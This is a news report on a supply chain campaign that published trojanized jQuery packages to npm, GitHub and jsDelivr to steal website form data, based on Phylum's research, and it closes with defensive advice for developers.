In a recent turn of events, cyberattackers have once again set their sights on JavaScript developers with a sophisticated and persistent supply chain attack. This attack involves the distribution of Trojanized packages for the widely-used JavaScript library jQuery across various repositories including Node Package Manager (npm) and jsDelivr, according to reports.
The malicious packages discovered contain a modified version of jQuery with additional malicious code embedded in the end function of the jQuery prototype. This code is designed to extract data from website forms and send it to multiple URLs. The Phylum Research Team, which is tracking these attacks, noted that the attackers have shown unconventional behavior by not following the typical patterns seen in software supply chain attacks. The variability across the malicious packages is notably high, making it stand out from previous attacks of this nature.
Since May 26, the unknown attackers have been spreading dozens of these malicious jQuery packages. The first variant was discovered on npm, the default package manager for Node.js, and later proliferated across npm packages over the course of a month. The researchers also found instances of the Trojanized jQuery on platforms like GitHub and even in a content delivery network (CDN)-hosted resource on jsDelivr.
Despite the relatively low volume of published packages (around 68 in total), the attackers have employed various tactics to evade detection. The packages are often named in a way that suggests they are legitimate jQuery files, such as jquery.min.js or other similar variations. Additionally, the attackers have used unique exfiltration URLs for each package and have published them under new usernames on npm.
What makes this attack unique is the manual nature in which it was executed. Unlike automated attacks that follow a clear pattern, the attackers behind this supply chain attack have shown a high level of customization and variability in their approach. Each package was carefully assembled and published over a long period of time, suggesting a targeted effort rather than a random attack.
The attack requires specific actions from the victim in order for the malware to be triggered. Users must install one of the malicious packages, use the trojanized jQuery file included in the package, and then invoke either the end function or the fadeTo function. While the end function is not widely used directly, the fadeTo function, which is part of jQuery’s animation toolkit, has a broader application.
Despite the targeted nature of the attack, the broad distribution of these malicious packages poses a significant threat to unsuspecting developers. The potential impact of such attacks underscores the need for heightened vigilance within the developer community and among organizations that rely on these libraries for their projects.
In light of these developments, developers are advised to be cautious when downloading and using jQuery packages. The Phylum Research Team has provided a list of all the malicious packages related to this campaign, along with details of when they were published and the usernames associated with their publication. Additionally, a list of domains related to the campaign has also been shared to help developers identify and avoid these malicious packages.
As supply chain attacks targeting code repositories continue to rise, it is essential for developers and organizations to implement rigorous security measures to protect their software supply chain from such threats. By staying informed and proactive, the developer community can safeguard against malicious attacks and ensure the integrity of their code repositories.